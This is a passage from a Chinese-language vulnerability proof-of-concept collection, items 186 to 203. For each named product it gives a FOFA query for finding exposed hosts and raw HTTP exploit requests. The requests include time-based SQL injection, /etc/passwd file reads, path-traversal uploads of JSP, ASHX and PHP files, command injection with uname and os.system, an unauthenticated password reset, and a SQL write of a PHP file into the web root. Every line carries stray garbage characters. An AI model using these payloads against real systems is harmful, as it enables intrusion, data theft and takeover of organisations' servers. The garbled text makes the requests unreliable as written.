( r+ d4 r+ S/ @( sGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1' l+ {+ |; X: k0 o* v( W) M0 K
Host: host4 A! K8 D8 a: L# [- h6 W
# c/ ~4 q2 G# j* n5 v6 `9 A. y0 \$ u! }
186. F-logic DataCube3 SQL注入5 Y- ^! Z0 X8 N. \+ ]7 C
CVE-2024-31750. Z) b& b* }1 a$ w( f! D) m
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
5 _5 V& J7 q5 F" d/ R! kFOFA:title=="DataCube3"/ g: B7 x4 m% {! b
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1% }/ L/ ^) k$ I' o1 J0 F
Host: your-ip
" x+ \0 f5 A- J9 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0+ n5 R" ]) s+ ^ p5 Z8 ~/ f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' l" U8 b8 z: T# e/ p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 l0 q, R' a) @+ R2 M$ JAccept-Encoding: gzip, deflate
0 B D, v4 }/ D. BConnection: close
. b& A( [( u, ~( ]& t3 s/ [Content-Type: application/x-www-form-urlencoded7 a, |( t, q4 e: b: T8 |
2 I: X, x! S d t* K3 jreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14505 S% V e" L5 U7 d' q
( _$ m$ T) E0 y1 [: H
1 A, {" J5 L5 Z187. Mura CMS processAsyncObject SQL注入9 V4 o; P( u& D
CVE-2024-32640: a% D: i% L/ U& g( ^; V
FOFA:"Mura CMS"9 e6 O) C- H7 I. f ^- Z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
/ k3 b' z$ a+ P" {Host: your-ip/ F5 o& ^7 \- X4 q
Content-Type: application/x-www-form-urlencoded* W/ l4 T8 t' g& A
# {/ `$ r, d" \, W( X3 d- S; |# {
# s, R7 c- m0 a/ Y6 s8 ^, k( bobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
( K3 V& M) E' [ ]3 o3 f1 `8 ^& l% h2 J8 p5 {% e3 l
0 Z E+ u7 Z9 p# I* o$ _188. 叁体-佳会视频会议 attachment 任意文件读取
8 X: @$ d: ^* }7 v& k+ x/ bversion <= 3.9.7
. P- _' g2 v/ {- g7 R! v) ^FOFA:body="/system/get_rtc_user_defined_info?site_id"
4 U: ? v& w5 l9 E% RGET /attachment?file=/etc/passwd HTTP/1.1
, R( @# U: X, L/ ?Host: your-ip
& G* d# D& G9 w0 t/ m, m# `* IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ J% Q% O% I. b; T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, r6 f* L+ Y$ v& l4 IAccept-Encoding: gzip, deflate
" S4 \: {1 u1 h! sAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 J" A* n0 o: ^5 H$ p4 l. A: sConnection: close0 b" s: w; r0 }4 S
r3 J6 _. B/ _4 J" g$ ?' z
2 h; P! q/ T5 t$ e% G$ E! F189. 蓝网科技临床浏览系统 deleteStudy SQL注入
6 ~! M; K4 S( J" v; HFOFA:app="LANWON-临床浏览系统"
/ p: F+ C' X* s0 J) E8 ~7 I. LGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 u# I) F) r1 T9 t( ~8 |' y
Host: your-ip
8 C) Q, {! ~" B7 U8 _5 LUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- ?# J! X' G% [; p4 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: K3 o& Z1 H& @$ D, @8 r/ w
Accept-Encoding: gzip, deflate
" d$ j' c4 w7 e) vAccept-Language: zh-CN,zh;q=0.9
2 Z7 v( H/ E/ v$ ` R" c K& MConnection: close
( [: C: p. b3 U% {7 ]: S1 w. O# D. U
2 e7 r R% L, E; u3 Z
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
3 E% h' a" H" f& e5 d. X0 sFOFA:title=="短视频矩阵营销系统"0 K- f4 G9 T2 B# P, |
POST /index.php/admin/Userinfo/poihuoqu HTTP/20 ?# L4 f, r! p, J `; W( g
Host: your-ip! ~3 k% A7 L+ D4 W" |5 U: M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
6 z& U4 C6 D- t D2 N* |1 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. ~* e; b8 Q# r8 ]0 ~7 VContent-Type: application/x-www-form-urlencoded
) B: Q( A( @- }+ v: t! \Accept-Encoding: gzip, deflate
2 H9 O" l7 I; [! a. h' r6 l1 Q2 |Accept-Language: zh-CN,zh;q=0.93 ]4 o, X* N8 {2 M* q/ p7 z
% s; k5 G( D+ }) {9 [7 e. P
poi=file:///etc/passwd) n' t$ H* {2 m' h, f, ~4 p3 L
" s- \/ E8 s- D8 I6 H: h
8 R0 R) [4 y# M9 ]
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入9 u2 G+ y6 Y6 q* b
FOFA:body="/CDGServer3/index.jsp"" o4 I6 g2 X/ o! S7 T2 f+ z) M
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
# D- v' m" }* X# YHost: your-ip, a5 B3 h! H! D. h9 u, }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ }+ C0 e& c2 P9 fContent-Type: application/x-www-form-urlencoded- }' {! U* }2 ^0 {" e- t
4 n! j: P q0 ^
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
( n) Q( n3 k* \: n5 T5 F+ y2 B
0 w1 J& H" T6 a& q9 J V. S" v+ u
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( w4 X0 O0 Q( s) o) a8 \0 V. }FOFA:title="用户登录_富通天下外贸ERP"
+ n: D6 R0 W! {POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
9 O% j) n' m2 L# t$ R8 RHost: your-ip) F: R/ A, K* d5 ?% ^* F" V1 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 a9 ~: r$ {, |; I2 H7 J* u- cContent-Type: application/x-www-form-urlencoded
% P6 X3 \4 J4 q1 \ o6 n( h! a
+ O" [: W8 {0 b/ v0 X {& }- j- Z# v9 S" ]0 c
<% @ webhandler language="C#" class="AverageHandler" %>; g1 E( F% G2 t- _
using System;- }# H; e; L* D x: m! A, l
using System.Web;
$ G4 _& ?# o& u Kpublic class AverageHandler : IHttpHandler
, h5 T: L" D2 v( a{
' R' \+ f$ k( t. L" O) ipublic bool IsReusable, ]* o; n( k/ e4 x
{ get { return true; } }
/ q' U, Q ]5 t) G! Opublic void ProcessRequest(HttpContext ctx)& I9 G* X- P/ p$ Q+ o: Y0 q1 k
{
4 A% H5 \/ a7 e& l' b" b( ?ctx.Response.Write("test");
6 ]( l) M! H! B% h; \2 N! r! r' c0 ]4 J}
( J( C9 ^, z9 C4 o7 K$ F} |5 Y$ O$ |( x# G: E
' u7 o$ F1 m, s' H2 v- a0 @2 O$ G5 ]1 G. }, }! K
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行: a5 S5 R0 R: b8 a( e2 S3 C
FOFA:body="山石云鉴主机安全管理系统"9 K5 J2 I0 p! E2 k1 w7 n" X
GET /master/ajaxActions/getTokenAction.php HTTP/1.16 T6 Z b! S) K5 c! k
Host:
# P7 V7 {. K( [4 _4 C. k5 xCookie: PHPSESSID=2333333333333;' q+ N" N7 K; j5 N I8 W
Content-Type: application/x-www-form-urlencoded
# b( ?* d( g7 X4 u& EUser-Agent: Mozilla/5.04 F+ c1 D3 ~' V, E7 i- k \& [& f
* J2 h# I; R' C6 g' R
' \: \6 B- Q j7 v0 M. }0 u8 M t
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1" B# H1 X, h" T& z
Host:
v2 B0 y& Q8 |" o$ P2 A8 {User-Agent: Mozilla/5.0
' @- F- f& h& u7 @Accept-Encoding: gzip, deflate( R! t6 j0 t- R/ j2 [
Accept: */*" o& Z3 F! i2 A' u8 ^$ C
Connection: close
' m8 f8 e2 v" t5 j; e/ `! r" ~Cookie: PHPSESSID=2333333333333;
0 S& L8 n0 ]7 H0 {/ `Content-Type: application/x-www-form-urlencoded2 E% V+ c7 Z+ d8 v! y
Content-Length: 84. {3 t; l' {( M6 u& S( r! {+ F: o
. C9 d; u1 \5 v2 cparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')% z. J/ {; N1 M7 U0 ]/ j
! }4 X/ h' X1 x: W* z7 a: o# c1 i( g% v4 Q/ r1 U
GET /master/img/config HTTP/1.14 d/ R$ B$ @5 y4 r& R1 e
Host:4 D* A# d" \( K4 |2 Q* p, _1 O
User-Agent: Mozilla/5.03 n3 r1 n( P' i3 ?. E/ u
. a* L8 \0 Y8 }
6 n$ G2 B, P' F7 A5 N
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 [ X0 Q" U! x1 u. D) GFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
4 `+ z2 ?- U2 L0 @* j+ P7 q* [/ O3 \ _# u! A; Z4 l) U: q6 a* h
POST /servlet/uploadAttachmentServlet HTTP/1.1
! v9 c, I/ _. ]4 ~Host: host
O* Q4 Z3 f% ~: \$ j$ L: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
" r7 d; j, `) n" T) D t9 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 J' s1 m/ W& K$ B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 y7 _( X" M( Y7 lAccept-Encoding: gzip, deflate
; U" a8 Y# r9 Q" Z* EConnection: close7 R( C( N3 g4 t; w! t9 {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk% \" @: x" o ?1 f
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
: _1 R1 `) a7 C! B! y
0 Z @' i0 F6 {9 k: R1 uContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"$ v8 {9 j/ t5 j7 |4 K W
Content-Type: text/plain
8 N8 I! u% a& J3 `) _5 i1 O<% out.println("hello");%>
* @# [9 j0 j8 O. R4 o: r: `------WebKitFormBoundaryKNt0t4vBe8cX9rZk) `! \1 M- y$ U
Content-Disposition: form-data; name="json" q' d, ~) y& S3 c- i
{"iq":{"query":{"UpdateType":"mail"}}}
2 l: J8 t, Q8 x. X5 W( C------WebKitFormBoundaryKNt0t4vBe8cX9rZk--& X& q( u) M2 @( t% k+ Z" Z8 M/ Z
' z7 P9 m% g; L
U9 A ~* w, ^( x195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
* @- {+ p# P4 r3 x, iFOFA:title=="飞鱼星企业级智能上网行为管理系统# ~6 g4 ~9 o* Q; B6 A
POST /send_order.cgi?parameter=operation HTTP/1.1
' B" u- F& }% r9 ]) IHost: 127.0.0.1
4 Y5 F; H; ^+ d* PPragma: no-cache
3 E; ?/ `# j1 D; Q9 V* \Cache-Control: no-cache
9 {' |5 c8 j. K/ AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) o8 V# f6 V% T. _
Accept: */*
/ Y( ~. @5 }# ?; P# U4 z7 DAccept-Encoding: gzip, deflate
' _) c5 G: j/ m M6 lAccept-Language: zh-CN,zh;q=0.9
2 B: Z) y( ?! _3 \9 \2 H1 f2 R fConnection: close
* P# Z0 c, r, ]* B& J1 cContent-Type: application/x-www-form-urlencoded
& W, Y8 r9 `7 j4 O, ?Content-Length: 68
# S# l5 K5 X# |) T3 j) _8 g* N% v. X! J
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}, D4 T/ P" |, D) b+ D, |, B
+ w3 b: ^! O$ |% H8 X& [$ t' K
# X5 m6 w4 K* p# A2 ?6 s196. 河南省风速科技统一认证平台密码重置
3 A; x! L" f2 K/ a$ r. I. RFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
7 D A$ Y3 L$ v# U, R" GPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1% r E# B/ {" N2 T/ R E2 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ q. b( P0 R3 m2 H0 T$ r. i" YContent-Type: application/json;charset=UTF-8: o8 @9 E! E& P$ c5 v' |6 A7 x
X-Requested-With: XMLHttpRequest5 {: [ Q/ W* s% x! r2 J
Host:
( Q1 M7 a) }- x6 X, k3 MAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+ c1 w6 g' T3 |$ CContent-Length: 45
: Y% ^; Z: E6 O# o# A( a, [% w3 gConnection: close' U# g% h4 `9 y4 C U' O4 m4 A4 @
7 B5 `/ T1 j# v* X3 s% ?0 B{"xgh":"test","newPass":"test666","email":""}3 i. R2 k+ b4 d5 T2 m
' G: i) g E1 A X- C1 a3 v" X# K4 H$ P
7 @. ^) E# q, S/ S0 J* @
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
, v- ]: I% D5 n0 \! b2 fFOFA:app="浙大恩特客户资源管理系统"' r: u$ i' [* h% Y) u
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.19 [) i7 }8 c% a; Q, F; v9 _
Host:
; w+ _$ g: ?4 U* f. C6 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
6 J7 X! z5 t: c @% aAccept-Encoding: gzip, deflate r/ d4 s) b- f7 `( B
Connection: close$ p; N% m9 x/ q# X# k; B$ K$ ^& H
7 D% l: J! Z7 [9 V6 ^0 ^# \
/ r, Y) _) ^4 d8 L% h' \
9 ~( x. V" E, u- j
198. 阿里云盘 WebDAV 命令注入; i; e2 U' Z7 c. k
CVE-2024-29640
8 n% r( P1 A# a# Q3 GGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
. [/ |) w) _8 kCookie: sysauth=41273cb2cffef0bb5d0653592624cf643 v. B4 N9 T' z+ V h0 ?
Accept: */*) X+ \$ T, p/ j
Accept-Encoding: gzip, deflate
6 E8 r2 F+ L% VAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
: z. p/ W: I" P6 MConnection: close: C2 v d0 e1 _( M
+ n" V% u0 A0 V/ X& l' {% {+ F1 J
. K0 L, [- {. p- J& d" X. Y
199. cockpit系统assetsmanager_upload接口 文件上传
/ `7 G: n- y7 a$ ]0 b: C& d
0 ^( [+ M: y ~* D7 C. p* p2 Z% `1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
( C+ y2 t% N6 I( D, IGET /auth/login?to=/ HTTP/1.1
+ r* F4 H0 l$ I, g2 X* C* A T* x# B# u1 ?' ~
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
% R/ R! V9 n' {% S0 Y) I& U* B9 I \7 h0 e' r; `
2.使用刚才上一步获取到的jwt获取cookie: T0 i# B4 P1 i% v: v b4 d
3 d3 B1 G5 N3 w# ^
POST /auth/check HTTP/1.1
3 y& J) Y5 V2 nContent-Type: application/json. O& J: L! N2 T3 M' ^
8 S. L5 A+ `5 Q9 o+ U{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}4 ~; u- S# Q0 x
" c7 r& @9 P! P h# v% G/ V5 z* L响应:200,返回值:
' \7 k+ M: I& R% f: l4 vSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/: {0 ]/ {& q" q7 ~
Fofa:title="Authenticate Please!"7 b/ W- ]/ O8 G0 r# Z5 z
POST /assetsmanager/upload HTTP/1.1
' k: Y1 J- s4 p8 k' bContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3. S. W4 G, |( H) N* F
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92# Y* T" ^" p( {
$ z2 n$ k7 g: T7 A+ }; s
-----------------------------36D28FBc36bd6feE7Fb3
! ]1 b: m1 r! ?) K, r9 UContent-Disposition: form-data; name="files[]"; filename="tttt.php"
/ E: }" o- k! I1 M/ L( cContent-Type: text/php4 O( P) F: s) ], A: k7 ^
% h+ E% y3 F9 p! {<?php echo "tttt";unlink(__FILE__);?>) G4 t5 Y- Y$ Q( r8 W5 r
-----------------------------36D28FBc36bd6feE7Fb39 ^# ]6 F. M; _
Content-Disposition: form-data; name="folder"" f* ?: r: c. f0 z
# t/ @6 {/ H: k; Y) |-----------------------------36D28FBc36bd6feE7Fb3--9 F+ a' a6 E! L, o, R. i
, ~! R- \* E% g9 l2 m Z- x4 e9 U5 F9 c
/storage/uploads/tttt.php a' _* ~6 g0 v4 u+ U2 X# B
& z5 Z y1 J# a- s7 {" f
200. SeaCMS海洋影视管理系统dmku SQL注入6 w. L1 E+ S. z( T- E- t; ^. Q
FOFA:app="海洋CMS"
. O+ ~, Z. @1 L6 u9 jGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
, [9 u: c# A0 b ?7 HCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
4 y0 ]; r9 H( _% s! oUpgrade-Insecure-Requests: 1
. |+ ?* H' ]& VCache-Control: max-age=0
@9 X' V) d k) `! R$ p, ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% o) {( t) h6 r: ?( |4 Q, W' gAccept-Encoding: gzip, deflate
. F% d" p/ F- xAccept-Language: zh-CN,zh;q=0.9
0 v/ f& u; I, \& ^/ x' c: c) Z
- p3 F& D/ q8 q% G, D% ]( }( u3 Z2 m/ j
201. 方正全媒体新闻采编系统 binary SQL注入% T0 R8 j6 S$ c5 u( E
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
# h9 ^' b" a% I# HPOST /newsedit/newsplan/task/binary.do HTTP/1.1
4 w" o1 h5 { Z% {. ~" uContent-Type: application/x-www-form-urlencoded, S/ E' {/ ~* q& y( u/ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! T }; G# l; OAccept-Encoding: gzip, deflate
% h z7 x* J* ]' I. zAccept-Language: zh-CN,zh;q=0.9
0 L) \2 Y( t& B. O1 NConnection: close
2 O5 I3 O) A3 D1 z8 t3 M3 \; k
! ?( a/ _! z' _6 F5 r7 E: YTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1# r7 f& m% J7 v; O9 O t% ]( Y" n
$ v5 t9 {+ E& I* D/ C% @$ h
' S2 X0 d; b! g202. 微擎系统 AccountEdit任意文件上传
3 h" X7 r( c; `( `# cFOFA:body="/Widgets/WidgetCollection/"
1 }1 j. P' T: t获取__VIEWSTATE和__EVENTVALIDATION值/ r: ^4 M8 D3 P/ L7 n: N) ]
GET /User/AccountEdit.aspx HTTP/1.15 s! y- s8 N+ E' `2 m: L0 d+ j6 T
Host: 滑板人之家9 a+ t2 K( @+ w$ o. _- Q% q& `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31: v1 ^5 b. J8 r! v I
Content-Length: 0/ M& [# {: ~$ |7 }
# _3 G$ H3 o; Z: L$ G! V
% [ l' G$ e$ b' f1 h+ |替换__VIEWSTATE和__EVENTVALIDATION值' P( |, B! B% B& |* {
POST /User/AccountEdit.aspx HTTP/1.1' Z% h! V% b! a1 U* f* ?
Accept-Encoding: gzip, deflate, br5 J3 ~" Q5 y6 c: x! g" x3 J
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
3 T- E( {& u0 k! q6 K
0 k; V0 q# B# N-----------------------------786435874t38587593865736587346567358735687
; F1 u5 T$ ?2 i0 I' d" {2 ?) _Content-Disposition: form-data; name="__VIEWSTATE": s6 {, e) K8 E! j, P' H
) }& ^) k7 q2 t" B$ a__VIEWSTATE, |& c' _; t' E" S
-----------------------------786435874t385875938657365873465673587356870 E' k' Q3 b6 l2 [& x' u
Content-Disposition: form-data; name="__EVENTVALIDATION". n( X3 V! n( s3 }
4 [ n# ?) z* E) y, G* O__EVENTVALIDATION+ x( M. m8 W& g4 R
-----------------------------786435874t385875938657365873465673587356872 C; z( j) W( H
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
. b' \" B6 j9 }8 M7 X! ?2 hContent-Type: text/plain
5 ]) Y# r8 M- o8 u; V" Z
9 v3 |% [- Q" X7 \Hello World!2 v" \: |# e, K5 E" A
-----------------------------786435874t38587593865736587346567358735687
/ X/ y! Q G! ]5 H( SContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"( v+ a" S8 |# ]( R. G
: A l- ~" H! W& B h1 b上传图片8 c0 R" t5 A- Z5 b% |: c
-----------------------------786435874t38587593865736587346567358735687
+ x3 X- u$ q& U+ I9 s4 g& V) wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
' T m8 i. \/ C' t3 q: C1 B Z. l3 c
$ x; |0 w+ N4 |4 R% K, W' H" k; F W" R3 @. R# c: Y
-----------------------------786435874t38587593865736587346567358735687
$ ]( M! t! M0 tContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
+ r3 e1 t3 ] m
* A& O; ^; ~! ?5 v g; j' d. u1 I7 P- K
-----------------------------786435874t38587593865736587346567358735687--
/ x1 k) U, j7 |7 R- D7 }
3 w! b9 L1 Q0 m% j' J0 q3 [
4 c1 Q" _4 O0 b% W7 `/_data/Uploads/1123.txt+ ^' W/ S) C9 ? P0 U) E; B5 D
8 u% {" x& ?* c! c203. 红海云EHR PtFjk 文件上传
0 ^! i: K* P+ n! d2 V0 j* J: iFOFA:body="RedseaPlatform"
/ B- a( @# s; B9 ~' k1 H% RPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1' A- Z0 U0 z5 J5 W1 C! e9 R
Host: x.x.x.x; O) J- E7 W0 w, E7 d- ` D
Accept-Encoding: gzip' w% p k+ f& P8 D* ^. ^0 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ~$ ]- G* q: Q8 R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
, H# z7 g; K8 B8 F. qContent-Length: 2108 M' a9 i* P5 R. l4 Q
0 v! V8 R" @. @, e# I. M; @6 [+ d' h. L------WebKitFormBoundaryt7WbDl1tXogoZys4& n C! z" Y1 ~9 O7 k
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"9 W3 V: C: \1 s' Z2 h- }! p
Content-Type:image/jpeg _: S1 w' l4 L3 n2 @; k
1 s8 [8 C6 Z8 S D. R0 H2 F" y) t( m
<% out.print("hello,eHR");%>
) d4 e! p- ?/ J3 I# o Y1 Z) M0 n4 m------WebKitFormBoundaryt7WbDl1tXogoZys4--
9 @; S- `, X! }3 a. l' e8 a- }& p
7 R& e) j5 j& b: t3 s9 a% ]& `. ~ N8 Y, D, X& R/ B, [) {
, q2 V8 Y# M" J
. ]8 Y& c) }: c( x0 K( ]; R, m6 D8 v! k7 k+ H, k) r
8 \; n- A8 R& Q4 p( E |